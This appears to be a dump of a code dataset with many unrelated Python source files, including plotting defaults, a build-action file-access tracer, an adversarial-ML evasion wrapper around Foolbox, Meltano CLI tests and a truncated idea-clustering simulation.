content
stringlengths 5
1.05M
|
|---|
import matplotlib as mpl
import matplotlib.font_manager
def mydefaults(fig, ax, r=0.51, s=1):
"""
Parameters
----------
fig, ax : figure and axes handle from matplotlib
r : height/width ratio
s : scaling of font size
Example
-------
from mydefaults import mydefaults
fig, ax = mpl.pyplot.subplots()
fig, ax = mydefaults(fig, ax)
"""
#fig, ax = mpl.pyplot.subplots()
# Specify fig size
fig.set_size_inches(s*(13.2/2.54), s*r*(13.2/2.54), forward=True)
# Use tex and correct font
#mpl.rcParams['font.family'] = 'Serif'
mpl.rcParams['font.serif'] = ['computer modern roman']
#mpl.rcParams['text.usetex'] = True # makes zeros bold?
mpl.rcParams['font.size'] = 11
mpl.rcParams['font.weight'] = 'normal'
# MATLAB default (see MATLAB Axes Properties documentation)
mpl.rcParams['axes.titlesize'] = 1.1*11
mpl.rcParams['axes.titleweight'] = 'bold'
# MATLAB default (see MATLAB Axes Properties documentation)
mpl.rcParams['axes.labelsize'] = 1.1*11
mpl.rcParams['axes.labelweight'] = 'normal'
# MATLAB default (see MATLAB Axes Properties documentation)
mpl.rcParams['legend.fontsize'] = 0.9*11
# remove margine padding on axis
mpl.rcParams['axes.xmargin'] = 0
mpl.rcParams['axes.ymargin'] = 0
# switch tick direction like MATLAB
mpl.rcParams['xtick.direction'] = 'in'
mpl.rcParams['ytick.direction'] = 'in'
mpl.pyplot.tight_layout(pad=1.3) # padding as fraction of font size
if isinstance(ax, tuple):
for axi in ax:
axi.tick_params(axis='both', which='both', direction='in')
else:
ax.tick_params(axis='both', which='both', direction='in')
# Save fig with transparent background
mpl.rcParams['savefig.transparent'] = True
# Make legend frame border black and face white
mpl.rcParams['legend.edgecolor'] = 'k'
mpl.rcParams['legend.facecolor'] = 'w'
mpl.rcParams['legend.framealpha'] = 1
# Change colorcycle to MATLABS
c = mpl.cycler(color=['#0072BD', '#D95319', '#EDB120', '#4DBEEE', '#77AC30', '#7E2F8E', '#A2142F'])
if isinstance(ax, tuple):
for axi in ax:
axi.set_prop_cycle(c)
else:
ax.set_prop_cycle(c)
# mpl.rcParams['axes.prop_cycle'] = c # doesnt work?
return fig, ax
|
# -*- coding: utf-8 -*-
__version__ = '0.1.0'
try:
__PANDAS_SHOULD_SETUP__
except NameError:
__PANDAS_SHOULD_SETUP__ = False
if not __PANDAS_SHOULD_SETUP__:
from . import dataframe
from . import series
|
#!/usr/bin/env python3
# Copyright 2020 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import os
import subprocess
import sys
def main():
parser = argparse.ArgumentParser(
description="Traces a GN action and enforces strict inputs/outputs",
argument_default=[],
)
parser.add_argument(
"--label", required=True, help="The wrapped target's label")
parser.add_argument(
"--trace-output", required=True, help="Where to store the trace")
parser.add_argument(
"--target-type",
choices=["action", "action_foreach"],
default="action",
help="Type of target being wrapped",
)
parser.add_argument("--script", required=True, help="action#script")
parser.add_argument("--response-file-name", help="action#script")
parser.add_argument("--inputs", nargs="*", help="action#inputs")
parser.add_argument("--sources", nargs="*", help="action#sources")
parser.add_argument("--outputs", nargs="*", help="action#outputs")
parser.add_argument("--depfile", help="action#depfile")
parser.add_argument("args", nargs="*", help="action#args")
args = parser.parse_args()
# Ensure trace_output directory exists
trace_output_dir = os.path.dirname(args.trace_output)
os.makedirs(trace_output_dir, exist_ok=True)
# TODO(shayba): make this work without assuming `fsatrace` in path
retval = subprocess.call(
["fsatrace", "rwmdt", args.trace_output, "--", args.script] + args.args)
# If inner action failed that's a build error, don't bother with the trace.
if retval != 0:
return retval
# Scripts with known issues
# TODO(shayba): file bugs for the suppressions below
ignored_scripts = [
"sdk_build_id.py",
# TODO(shayba): it's not the wrapper script that's the problem but some
# of its usages. Refine the suppression or just fix the underlying
# issues.
"gn_script_wrapper.py",
# When using `/bin/ln -f`, a temporary file may be created in the
# target directory. This will register as a write to a non-output file.
# TODO(shayba): address this somehow.
"ln",
# fxbug.dev/61771
# "analysis_options.yaml",
]
if os.path.basename(args.script) in ignored_scripts:
return 0
# `compiled_action()` programs with known issues
# TODO(shayba): file bugs for the suppressions below
ignored_compiled_actions = [
# fxbug.dev/61770
"banjo_bin",
"strings_to_json",
]
if args.script == "../../build/gn_run_binary.sh":
if os.path.basename(args.args[1]) in ignored_compiled_actions:
return 0
# Paths that the action is allowed to access
allowed_write = [os.path.abspath(path) for path in args.outputs]
depfile_deps = []
if args.depfile:
allowed_write.append(os.path.abspath(args.depfile))
with open(args.depfile, "r") as f:
depfile_deps += [
line.partition(":")[0]
for line in f.read().strip().splitlines()
]
allowed_read = [
os.path.abspath(path)
for path in [args.script] + args.inputs + args.sources + depfile_deps
] + allowed_write
if args.response_file_name:
allowed_read.append(os.path.abspath(response_file_name))
# Paths that are ignored
src_root = os.path.dirname(os.path.dirname(os.getcwd()))
ignored_prefix = [
# Allow actions to access prebuilts that are not declared as inputs
# (until we fix all instances of this)
os.path.join(src_root, "prebuilt"),
]
ignored_postfix = [
# Allow actions to access Python code such as via imports
".py",
# Allow actions to access Python compiled bytecode
".pyc",
# TODO(shayba): remove hack below for response files
#".rsp",
]
# Verify the filesystem access trace of the inner action
with open(args.trace_output, "r") as trace:
for line in trace.read().splitlines():
if not line[1] == "|":
# Not a trace line, ignore
continue
path = line[2:]
if not path.startswith(src_root):
# Outside of root, ignore
continue
if any(path.startswith(ignored) for ignored in ignored_prefix):
continue
if any(path.endswith(ignored) for ignored in ignored_postfix):
continue
op = line[0]
if op == "r":
if not path in allowed_read:
print(
f"ERROR: {args.label} read {path} but it is not a specified input!",
file=sys.stderr,
)
return 1
elif op in ("w", "d", "t"):
if not path in allowed_write:
print(
f"ERROR: {args.label} wrote {path} but it is not a specified output!",
file=sys.stderr,
)
return 1
elif op == "m":
for path in path.split("|"):
if not path in allowed_write:
print(
f"ERROR: {args.label} wrote {path} but it is not a specified output!",
file=sys.stderr,
)
return 1
# All good!
return 0
if __name__ == "__main__":
sys.exit(main())
|
import numpy as np
def character_mapper(char_map = " abcdefghijklmnopqrstuvwxyz'"):
'''
Creates two dictionaries that are used to convert words to Integer arrays and vice versa.
:params:
char_map - String, all characters that may occure in resulting words
:return:
id_to_char - Python dictionary, maps integer array to string representation (in respect to the char_map)
char_to_id - Python dictionary, maps characters to integer representation (in respect to the char_map)
'''
id_to_char = {i+1:j for i,j in enumerate(char_map)}
char_to_id = {j:i+1 for i,j in enumerate(char_map)}
return id_to_char, char_to_id
def word_to_int(word, char_to_id):
'''
Converts word to its Integer representation
:params:
word - String, input word that is converted to an integer representation
char_to_id - Python dictionary, maps characters to integer representation (in respect to the char_map)
:returns:
numpy array with an integer representation of the input word
'''
return np.array([char_to_id[c] for c in word])
def int_to_word(word_array, id_to_char):
'''
Converts an Integer array to its word/string representation.
:params:
word_array - Numpy array, an Integer representation that is used to 'recover' a word
id_to_char - Python dictionary, maps integer array to string representation (in respect to the char_map)
:returns:
result_string - String, resulting word/string representation of the input word_array
'''
result_string = ""
for c in word:
result_string += id_to_char[c]
return result_string
def action_accuracy(generator, model):
'''
Use this function to test the accuracy of classification model only on actions
'''
actions = ['yes',
'no',
'up',
'down',
'left',
'right',
'on',
'off',
'stop',
'go']
correct = 0
counter = 0
for sample_path in generator.testing_files:
t, sample = wavfile.read(sample_path)
sample = generator.featurize(sample)
pred = generator.classes[np.argmax(model.predict(np.array([sample])))]
if pred == sample_path.split("/")[-2] and pred in actions:
correct += 1
if sample_path.split("/")[-2] in actions:
counter += 1
return correct/counter
|
import fileinput
# Note: Print adds returns so use rstrip
file = "index.html"
findtag = "<script type"
inserttag = '<script type="text/javascript" src="playermarkers/playermarkers.js"></script>'
found = 0
for line in fileinput.input(file, inplace=True, backup=".bak"):
if line == "\n" or line == "\r\n":
print(line).rstrip()
elif line.startswith(findtag):
found = 1
print(line).rstrip()
elif not (line.startswith(findtag)) and found == 1:
found = 0
print inserttag
print(line).rstrip()
else:
print(line).rstrip()
|
"""
.. module:: CAttackEvasionFoolbox
:synopsis: Performs one of the Foolbox Evasion attacks
against a classifier.
.. moduleauthor:: Luca Demetrio <luca.demetrio@dibris.unige.it>
.. moduleauthor:: Maura Pintor <maura.pintor@unica.it>
"""
import eagerpy as ep
import foolbox as fb
import torch
from eagerpy import PyTorchTensor
from numpy import NaN
from secml.adv.attacks.evasion import CAttackEvasion
from secml.adv.attacks.evasion.foolbox.secml_autograd import \
SecmlLayer, as_tensor, as_carray
from secml.array import CArray
from secml.core.constants import inf
from secml.settings import SECML_PYTORCH_USE_CUDA
use_cuda = torch.cuda.is_available() and SECML_PYTORCH_USE_CUDA
class CAttackEvasionFoolbox(CAttackEvasion):
"""
Wrapper for the attack classes in Foolbox library.
Credits: https://foolbox.readthedocs.io/en/stable/.
Requires foolbox >= 3.3.0.
Parameters
----------
classifier : CClassifier
Trained secml classifier.
y_target : int or None, optional
If None an indiscriminate attack will be performed, else a
targeted attack to have the samples misclassified as
belonging to the y_target class.
lb : float or None, optional
Lower bound of the model's input space.
ub : float or None, optional
Upper bound of the model's input space.
epsilons : float or None, optional
The maximum size of the perturbations, required for the
fixed epsilon foolbox attacks.
fb_attack_class : fb.attacks.Attack
Attack class to wrap from Foolbox.
**attack_params : any
Init parameters for creating the attack, as kwargs.
"""
__class_type = 'e-foolbox'
def __init__(self, classifier, y_target=None, lb=0.0, ub=1.0,
epsilons=None, fb_attack_class=None, **attack_params):
super(CAttackEvasionFoolbox, self).__init__(
classifier=classifier,
y_target=y_target)
self.attack_params = attack_params
self.attack_class = fb_attack_class
self.lb = lb
self.ub = ub
# wraps secml classifier in a pytorch layer
self._pytorch_model_wrapper = SecmlLayer(classifier)
# wraps the pytorch model in the foolbox pytorch wrapper
self.f_model = _FoolboxModel(self._pytorch_model_wrapper,
bounds=(lb, ub))
self._last_f_eval = None
self._last_grad_eval = None
self._n_classes = self.classifier.n_classes
self._n_feats = self.classifier.n_features
self.epsilon = epsilons
self.dmax = epsilons if epsilons is not None else inf
self.attack = self.attack_class(**self.attack_params)
def _run(self, x, y, x_init=None):
self.f_model.reset()
if self.y_target is None:
criterion = fb.criteria.Misclassification(
as_tensor(y.ravel().astype('int64')))
else:
criterion = fb.criteria.TargetedMisclassification(
torch.tensor([self.y_target]))
x_t = as_tensor(x, requires_grad=False)
advx, clipped, is_adv = self.attack(
self.f_model, x_t, criterion, epsilons=self.epsilon)
if isinstance(clipped, list):
if len(clipped) == 1:
clipped = x[0]
else:
raise ValueError(
"This attack is returning a list. Please,"
"use a single value of epsilon.")
# f_opt is computed only in class-specific wrappers
f_opt = NaN
self._last_f_eval = self.f_model.f_eval
self._last_grad_eval = self.f_model.grad_eval
path = self.f_model.x_path
self._x_seq = CArray(path.numpy())
# reset again to clean cached data
self.f_model.reset()
return as_carray(clipped), f_opt
def objective_function(self, x):
return as_carray(self._adv_objective_function(as_tensor(x)))
def objective_function_gradient(self, x):
x_t = as_tensor(x).detach()
x_t.requires_grad_()
loss = self._adv_objective_function(x_t)
loss.sum().backward()
gradient = x_t.grad
return as_carray(gradient)
def _adv_objective_function(self, x):
raise NotImplementedError(
"Objective Function and Objective Function Gradient "
"are not supported with this constructor. Please, "
"use one of our wrapper-supported attacks.")
@property
def x_seq(self):
return self._x_seq
@property
def f_eval(self):
if self._last_f_eval is not None:
return self._last_f_eval
else:
raise RuntimeError("Attack not run yet!")
@property
def grad_eval(self):
if self._last_grad_eval is not None:
return self._last_grad_eval
else:
raise RuntimeError("Attack not run yet!")
class _FoolboxModel(fb.models.PyTorchModel):
"""Wraps a model and tracks function calls."""
def __init__(self, model, bounds, store_path=True):
self._original_model = model
self._f_eval = 0
self._grad_eval = 0
self._store_path = store_path
self._x_path = []
if not isinstance(model, torch.nn.Module):
raise ValueError(
"expected model to be a torch.nn.Module instance")
device = 'cuda' if use_cuda else 'cpu'
super().__init__(
model, bounds=bounds, preprocessing=None, device=device,
)
self.data_format = "channels_first"
@property
def bounds(self):
return self._bounds
@property
def x_path(self):
path = ep.concatenate(self._x_path, axis=0)
return path[:-1, ...] # removes last point
@property
def f_eval(self):
return self._original_model.func_counter.item()
@property
def grad_eval(self):
return self._original_model.grad_counter.item()
def __call__(self, x, *args, **kwargs):
x_t = x.raw.type(torch.float)
scores = self._model(x_t)
if self._store_path is True:
self._x_path.append(x)
return PyTorchTensor(scores)
def reset(self):
"""Resets the query counter."""
self._original_model.func_counter.zero_()
self._original_model.grad_counter.zero_()
if self._store_path is True:
self._x_path = list()
|
class MatchQuantity:
def __init__(self, matcher, min_n = 0, max_n = -1):
self.matcher = matcher
self.min = min_n
self.max = max_n
def parser(self, body : str, hard_fail = True):
head = 0
count = 0
result = []
while True:
sub_body = body[head:]
# If max is specified and we've reached it
if self.max > 0 and self.max == count:
# return the result and the head
return (result, head)
match = self.matcher.parser(sub_body, hard_fail = False)
if not match or head == len(body):
break
head += match[1]
result.append(match[0])
count += 1
if count < self.min:
if hard_fail:
raise ValueError(f"MatchQuantity: less than minimum matches")
else:
return False
return (result, head)
def to_string(self, call_count = 0):
return f"({self.matcher.to_string(call_count)}){{{self.min},{self.max}}}"
def __str__(self):
return self.to_string()
|
"""
Credits: https://github.com/aaron-xichen/pytorch-playground
"""
import torch
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
CIFAR10_PRETRAINED_URL = 'http://ml.cs.tsinghua.edu.cn/~chenxi/pytorch-models/cifar10-d875770b.pth'
def make_feature_layers(cfg, batch_norm=False):
layers = []
in_channels = 3
for i, v in enumerate(cfg):
if v == 'M':
layers.append(nn.MaxPool2d(kernel_size=2, stride=2))
else:
padding = v[1] if isinstance(v, tuple) else 1
out_channels = v[0] if isinstance(v, tuple) else v
conv2d = nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=padding)
layers.append(conv2d)
if batch_norm:
layers.append(nn.BatchNorm2d(out_channels, affine=False))
layers.append(nn.ReLU())
in_channels = out_channels
return nn.Sequential(*layers)
class CIFAR10(nn.Module):
def __init__(self, n_channel=128, num_classes=10, pretrained=False):
super().__init__()
cfg = [n_channel, n_channel, 'M', 2 * n_channel, 2 * n_channel, 'M', 4 * n_channel, 4 * n_channel, 'M',
(8 * n_channel, 0), 'M']
self.features = make_feature_layers(cfg, batch_norm=True)
self.classifier = nn.Sequential(
nn.Linear(8 * n_channel, num_classes)
)
if pretrained:
map_location = None
if not torch.cuda.is_available():
map_location = 'cpu'
state_dict = model_zoo.load_url(CIFAR10_PRETRAINED_URL, map_location=map_location)
self.load_state_dict(state_dict)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
|
# Python - 2.7.6
def decodeMorse(morseCode):
morseCode = morseCode.strip(' ').replace(' ', ' % ')
return ''.join([MORSE_CODE.get(code, ' ') for code in morseCode.split(' ')])
|
import sys
import click
from .. import shared
@shared.cli.command()
@click.argument("name1", required=True)
@click.argument("name2", required=True)
@click.pass_context
def diff(ctx, name1, name2):
"""Compare two documents."""
# yew = ctx.obj["YEW"]
doc1 = shared.get_document_selection(ctx, name1, list_docs=False)
doc2 = shared.get_document_selection(ctx, name2, list_docs=False)
"""Compare two documents."""
s = shared.diff_content(
doc1.get_content().rstrip().splitlines(),
doc2.get_content().rstrip().splitlines(),
)
click.echo(s)
|
from hm_env import HMEnv
from pprint import pprint
from stable_baselines.common.policies import MlpPolicy, CnnLstmPolicy
from stable_baselines.common.vec_env import DummyVecEnv
from stable_baselines import PPO2
import datetime
import matplotlib.pyplot as plt
import config as cfg
from tqdm import tqdm
def print_env(e: HMEnv):
for hw in e.highways:
print(hw)
print('=' * 10)
def train(total_timesteps):
env = HMEnv()
model = PPO2(MlpPolicy, env, verbose=1)
model.learn(total_timesteps=total_timesteps)
# save
cur_time = datetime.datetime.now()
filename = "{}{}{}-{}{}{}-step_{}".format(cur_time.year, cur_time.month, cur_time.day,
cur_time.hour, cur_time.minute, cur_time.second,
total_timesteps)
model.save('../models/{}'.format(filename))
def test(path: str):
model = PPO2.load(path)
data = [[[], [], cfg.HIGHWAYS[i]['name']] for i in range(len(cfg.HIGHWAYS))]
max_time = 3 * cfg.DAY_PER_YEAR
record_interval = 1
env = HMEnv()
obs = env.reset()
for step in tqdm(range(max_time)):
action, _states = model.predict(obs)
obs, reward, done, info = env.step(action)
# record
if step % record_interval == 0:
for i in range(len(cfg.HIGHWAYS)):
data[i][0].append(step)
data[i][1].append(env.highways[i].hp)
# plot
for single_data in data:
x, y, note = single_data
plt.plot(x, y, label=note)
plt.legend()
plt.show()
def foo():
env = HMEnv()
act = [3] * len(cfg.HIGHWAYS)
for i in range(10):
obs, reward, done, info = env.step(act)
print(reward)
if __name__ == "__main__":
# train(100000)
|
import os
import pytest
import functools
from unittest import mock
from asserts import assert_cli_runner
from meltano.cli import cli
from meltano.core.plugin import PluginType
from meltano.core.plugin_install_service import PluginInstallReason
from meltano.core.plugin.error import PluginMissingError
from meltano.core.m5o.dashboards_service import DashboardsService
from meltano.core.m5o.reports_service import ReportsService
class TestCliAdd:
@pytest.mark.parametrize(
"plugin_type,plugin_name,file_plugin_name",
[
(PluginType.EXTRACTORS, "tap-carbon-intensity", None),
(PluginType.LOADERS, "target-sqlite", None),
(PluginType.TRANSFORMS, "tap-carbon-intensity", None),
(PluginType.MODELS, "model-carbon-intensity", None),
(PluginType.DASHBOARDS, "dashboard-google-analytics", None),
(PluginType.ORCHESTRATORS, "airflow", "airflow"),
(PluginType.TRANSFORMERS, "dbt", "dbt"),
],
)
def test_add(
self,
plugin_type,
plugin_name,
file_plugin_name,
project,
cli_runner,
config_service,
):
# ensure the plugin is not present
with pytest.raises(PluginMissingError):
config_service.find_plugin(plugin_name, plugin_type=plugin_type)
with mock.patch("meltano.cli.add.install_plugins") as install_plugin_mock:
install_plugin_mock.return_value = True
res = cli_runner.invoke(cli, ["add", plugin_type.singular, plugin_name])
assert res.exit_code == 0, res.stdout
assert f"Added {plugin_type.descriptor} '{plugin_name}'" in res.stdout
plugin = config_service.find_plugin(plugin_name, plugin_type)
assert plugin
plugins = [plugin]
if file_plugin_name:
assert f"Added related file bundle '{file_plugin_name}'" in res.stdout
file_plugin = config_service.find_plugin(
file_plugin_name, PluginType.FILES
)
assert file_plugin
plugins.append(file_plugin)
install_plugin_mock.assert_called_once_with(
project, plugins, reason=PluginInstallReason.ADD
)
def test_add_multiple(self, project, cli_runner, config_service):
with mock.patch("meltano.cli.add.install_plugins") as install_plugin_mock:
install_plugin_mock.return_value = True
cli_runner.invoke(cli, ["add", "extractors", "tap-gitlab"])
with mock.patch("meltano.cli.add.install_plugins") as install_plugin_mock:
res = cli_runner.invoke(
cli, ["add", "extractors", "tap-gitlab", "tap-adwords", "tap-facebook"]
)
assert res.exit_code == 0, res.stdout
assert (
f"Extractor 'tap-gitlab' is already in your Meltano project"
in res.stderr
)
assert f"Added extractor 'tap-adwords'" in res.stdout
assert f"Added extractor 'tap-facebook'" in res.stdout
tap_gitlab = config_service.find_plugin("tap-gitlab", PluginType.EXTRACTORS)
assert tap_gitlab
tap_adwords = config_service.find_plugin(
"tap-adwords", PluginType.EXTRACTORS
)
assert tap_adwords
tap_facebook = config_service.find_plugin(
"tap-facebook", PluginType.EXTRACTORS
)
assert tap_facebook
install_plugin_mock.assert_called_once_with(
project,
[tap_gitlab, tap_adwords, tap_facebook],
reason=PluginInstallReason.ADD,
)
def test_add_transform(self, project, cli_runner):
# Add dbt and transform/ files
cli_runner.invoke(cli, ["add", "transformer", "dbt"])
cli_runner.invoke(cli, ["add", "files", "dbt"])
res = cli_runner.invoke(cli, ["add", "transform", "tap-google-analytics"])
assert res.exit_code == 0
assert (
"dbt-tap-google-analytics"
in project.root_dir("transform/packages.yml").open().read()
)
assert (
"tap_google_analytics"
in project.root_dir("transform/dbt_project.yml").open().read()
)
def test_add_dashboard(self, project, cli_runner):
def install():
return cli_runner.invoke(
cli, ["add", "dashboard", "dashboard-google-analytics"]
)
res = install()
assert res.exit_code == 0
dashboards_service = DashboardsService(project)
dashboards_count = len(dashboards_service.get_dashboards())
assert dashboards_count > 0
reports_service = ReportsService(project)
reports_count = len(reports_service.get_reports())
assert reports_count > 0
# Verify that reinstalling doesn't duplicate dashboards and reports
res = install()
assert res.exit_code == 0
assert len(dashboards_service.get_dashboards()) == dashboards_count
assert len(reports_service.get_reports()) == reports_count
def test_add_files_with_updates(
self, session, project, cli_runner, config_service, plugin_settings_service
):
result = cli_runner.invoke(cli, ["add", "files", "airflow"])
assert_cli_runner(result)
# Plugin has been added to meltano.yml
plugin = config_service.find_plugin("airflow", PluginType.FILES)
assert plugin
# Automatic updating is enabled
value, _ = plugin_settings_service.get_value(
session, plugin, "update.orchestrate/dags/meltano.py"
)
assert value == True
# File has been created
assert "Created orchestrate/dags/meltano.py" in result.output
file_path = project.root_dir("orchestrate/dags/meltano.py")
assert file_path.is_file()
# File has "managed" header
assert (
"This file is managed by the 'airflow' file bundle" in file_path.read_text()
)
def test_add_files_without_updates(self, project, cli_runner, config_service):
result = cli_runner.invoke(cli, ["add", "files", "docker-compose"])
assert_cli_runner(result)
# Plugin has not been added to meltano.yml
with pytest.raises(PluginMissingError):
config_service.find_plugin("docker-compose", PluginType.FILES)
# File has been created
assert "Created docker-compose.yml" in result.output
file_path = project.root_dir("docker-compose.yml")
assert file_path.is_file()
# File does not have "managed" header
assert "This file is managed" not in file_path.read_text()
def test_add_files_that_already_exists(self, project, cli_runner, config_service):
project.root_dir("transform/dbt_project.yml").write_text("Exists!")
result = cli_runner.invoke(cli, ["add", "files", "dbt"])
assert_cli_runner(result)
assert (
"File transform/dbt_project.yml already exists, keeping both versions"
in result.output
)
assert "Created transform/dbt_project (dbt).yml" in result.output
assert project.root_dir("transform/dbt_project (dbt).yml").is_file()
def test_add_related(self, project, cli_runner, config_service):
# Add dbt and transform/ files
cli_runner.invoke(cli, ["add", "transformer", "dbt"])
cli_runner.invoke(cli, ["add", "files", "dbt"])
with mock.patch("meltano.cli.add.install_plugins") as install_plugin_mock:
install_plugin_mock.return_value = True
res = cli_runner.invoke(
cli, ["add", "--include-related", "extractor", "tap-gitlab"]
)
assert res.exit_code == 0
tap = config_service.find_plugin("tap-gitlab", PluginType.EXTRACTORS)
assert tap
transform = config_service.find_plugin("tap-gitlab", PluginType.TRANSFORMS)
assert transform
model = config_service.find_plugin("model-gitlab", PluginType.MODELS)
assert model
dashboard = config_service.find_plugin(
"dashboard-gitlab", PluginType.DASHBOARDS
)
assert dashboard
install_plugin_mock.assert_called_once_with(
project,
[tap, transform, model, dashboard],
reason=PluginInstallReason.ADD,
)
def test_add_missing(self, project, cli_runner, config_service):
res = cli_runner.invoke(cli, ["add", "extractor", "tap-unknown"])
assert res.exit_code == 1
assert "extractor 'tap-unknown' is not known to Meltano" in res.stdout
assert res.stderr
# ensure the plugin is not present
with pytest.raises(PluginMissingError):
config_service.find_plugin("tap-unknown", PluginType.EXTRACTORS)
@pytest.mark.xfail(reason="Uninstall not implemented yet.")
def test_add_fails(self, project, cli_runner, config_service):
res = cli_runner.invoke(cli, ["add", "extractor", "tap-mock"])
assert res.exit_code == 1, res.stdout
assert "Failed to install plugin 'tap-mock'" in res.stdout
assert res.stderr
# ensure the plugin is not present
with pytest.raises(PluginMissingError):
config_service.find_plugin("tap-mock", PluginType.EXTRACTORS)
def test_add_custom(self, project, cli_runner, config_service):
stdin = os.linesep.join(
# namespace, executable, pip_url
["custom", "-e path/to/tap-custom", "tap-custom-bin"]
)
with mock.patch("meltano.cli.add.install_plugins") as install_plugin_mock:
install_plugin_mock.return_value = True
res = cli_runner.invoke(
cli, ["add", "--custom", "extractor", "tap-custom"], input=stdin
)
plugin = config_service.find_plugin("tap-custom", PluginType.EXTRACTORS)
assert plugin.name == "tap-custom"
assert plugin.executable == "tap-custom-bin"
install_plugin_mock.assert_called_once_with(
project, [plugin], reason=PluginInstallReason.ADD
)
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import odoo.tests
@odoo.tests.common.at_install(False)
@odoo.tests.common.post_install(True)
class TestUi(odoo.tests.HttpCase):
def test_01_wishlist_tour(self):
self.start_tour("/", 'shop_wishlist')
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# model 3-4 近い距離にある点をクラスター化するモデル
#
# $X_{i}$の数$N$と平均ステップ間距離$\phi$の間の関係
# ※時間がかかります。
import matplotlib.pyplot as plt
import numpy as np
from scipy.spatial.distance import euclidean as euc
import collections
import operator
import random
import bisect
from itertools import chain
from scipy.optimize import leastsq
__author__ = 'Shotaro Fujimoto'
def uniq_list(seq):
seen = set()
seen_add = seen.add
return [x for x in seq if x not in seen and not seen_add(x)]
def accumulate(iterable, func=operator.add):
"""Return running totals
Usage:
accumulate([1,2,3,4,5]) --> 1 3 6 10 15
accumulate([1,2,3,4,5], operator.mul) --> 1 2 6 24 120
"""
it = iter(iterable)
total = next(it)
yield total
for element in it:
total = func(total, element)
yield total
def weighted_choice(d):
choices, weights = zip(*d)
cumdist = list(accumulate(weights))
x = random.random() * cumdist[-1]
return choices[bisect.bisect(cumdist, x)]
class Person:
def __init__(self, master, id, ideas, w):
"""Initialize argmunets.
Keyword arguments:
master : Master class (call from "Meeting")
self.id : Id for each person [0, 1, ..., N-1]
self.ideas: ideas in space [0,1] × [0,1]
self.w : probability weight for the person to speak
"""
self.id = id
self.ideas = ideas
self.w = w
# add_ideas : place, tag : (x, y), [person_id, cluster_id]
master.ideas += [[(i1, i2), [self.id, 0, self.w]]
for i1, i2 in self.ideas]
class Cluster:
def __init__(self, ideas, r):
"""make cluster with self.r
cluster_link:
"""
self.ideas = ideas
self.r = r
self.l = 0
self.cluster_link = []
self.clustering()
def clustering(self):
self.cell_num = int(1. / self.r)
lr = 1. / self.cell_num
self.cell = dict() # key: (cellx,celly), value: list of ids
self.rcell = []
for i, idea in enumerate(self.ideas):
cellx = int(idea[0][0] / lr)
celly = int(idea[0][1] / lr)
if self.cell.has_key((cellx, celly)):
self.cell[(cellx, celly)] += [i]
else:
self.cell[(cellx, celly)] = [i]
self.rcell.append((cellx, celly))
num = 1
for i in range(len(self.ideas)):
num += self.find_nearest(i, num)
return self.cluster_link
def find_nearest(self, idea_id, num):
"""find nearest idea
idea_id: index in self.ideas
"""
cx, cy = self.rcell[idea_id]
place = self.ideas[idea_id][0]
CX = uniq_list([max(0, cx - 1), cx, min(cx + 1, self.cell_num - 1)])
CY = uniq_list([max(0, cy - 1), cy, min(cy + 1, self.cell_num - 1)])
tmp = [self.cell[(i, j)]
for i in CX for j in CY if self.cell.has_key((i, j))]
tmp = list(chain.from_iterable(tmp))
tmp.remove(idea_id)
if len(tmp) == 0:
self.ideas[idea_id][1][1] = num
return 1
nearest = []
cid = [num]
for k in tmp:
if euc(self.ideas[k][0], place) > self.r:
continue
nearest.append(k)
prenum = self.ideas[k][1][1]
if prenum == 0:
cid.append(num)
self.cluster_link.append((idea_id, k))
elif prenum < num:
cid.append(prenum)
if not (k, idea_id) in self.cluster_link:
self.cluster_link.append((idea_id, k))
self.l += len(nearest)
cluster_id = min(cid)
if cluster_id < num:
ans = 0
else:
ans = 1
self.ideas[idea_id][1][1] = cluster_id
for i in nearest:
self.ideas[i][1][1] = cluster_id
cid.remove(num)
if len(cid) == 0:
return ans
cid.remove(cluster_id)
if len(cid) == 0:
return ans
for i in cid:
for x in self.ideas:
if x[1][1] == i:
x[1][1] = cluster_id
return ans
class Meeting:
def __init__(self, K, N, S=20, r=0.06, draw=True):
self.K = K
self.N = N
self.S = S
self.r = r
self.ideas = []
self.minutes = []
self.ave_l = 0
self.draw = draw
def gather_people(self, ideass=None, weights=None):
"""Gather participants.
Keyword arguments:
ideas : list of ideas for each person
ex) [((0.3,0.1),(0.2,0.5)), ((0.5,0.6))] when N = 2
weights: list of weights for the probability of the person to speak
"""
if not ideass:
x = np.random.rand(self.N, self.S * 2)
ideass = []
for _x in x:
ideass.append([(i, j) for i, j in zip(_x[::2], _x[1::2])])
if not weights:
weights = [1.] * self.N
for i, ideas, w in zip(range(self.N), ideass, weights):
Person(self, i, ideas, w)
def init(self):
self.gather_people()
cluster = Cluster(self.ideas, self.r)
self.cluster_link = cluster.cluster_link
self.ave_l = cluster.l / float(len(self.ideas))
if self.draw:
colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
self.fig = plt.figure(figsize=(9, 9))
self.ax = self.fig.add_subplot(1, 1, 1)
self.labels = []
self.s1 = []
for idea, tag in self.ideas:
x = idea[0]
y = idea[1]
s = self.ax.scatter(x, y,
c=colors[tag[0] % len(colors)],
alpha=0.2)
self.s1.append(s)
data = []
for link in self.cluster_link:
ix = self.ideas[link[0]][0][0]
iy = self.ideas[link[0]][0][1]
jx = self.ideas[link[1]][0][0]
jy = self.ideas[link[1]][0][1]
data += [(ix, jx), (iy, jy), 'k']
self.ax.plot(*data, alpha=0.5)
def progress(self):
self.init()
preidea = self.ideas[np.random.choice(range(len(self.ideas)))]
self.minutes.append(preidea)
l = list(self.ideas)
self.k = 1
while self.k < self.K + 1:
# remove ideas in the same cluster
l = [idea for idea in l if idea[1][1] != preidea[1][1]]
# if no one can speak: meeting ends.
if len(l) == 0:
break
# confirm cluster id which is nearest from the preidea
distance = [(euc(preidea[0], i[0]), i) for i in l]
minclusterid = min(distance)[1][1][1]
# gather ideas in the cluster
tmp = [idea for idea in l if idea[1][1] == minclusterid]
d = dict()
for t in tmp:
d[t[1][0]] = d.get(t[1][0], 0) + t[1][2]
d = [(k, v) for k, v in d.items()]
# chose whose ideas to be chosed from the cluster
whois = weighted_choice(d)
# gather ideas
who = [idea for idea in tmp if idea[1][0] == whois]
p = [(idea, idea[1][2]) for idea in who]
# chose the next idea from the id is "whois"
idea = weighted_choice(p)
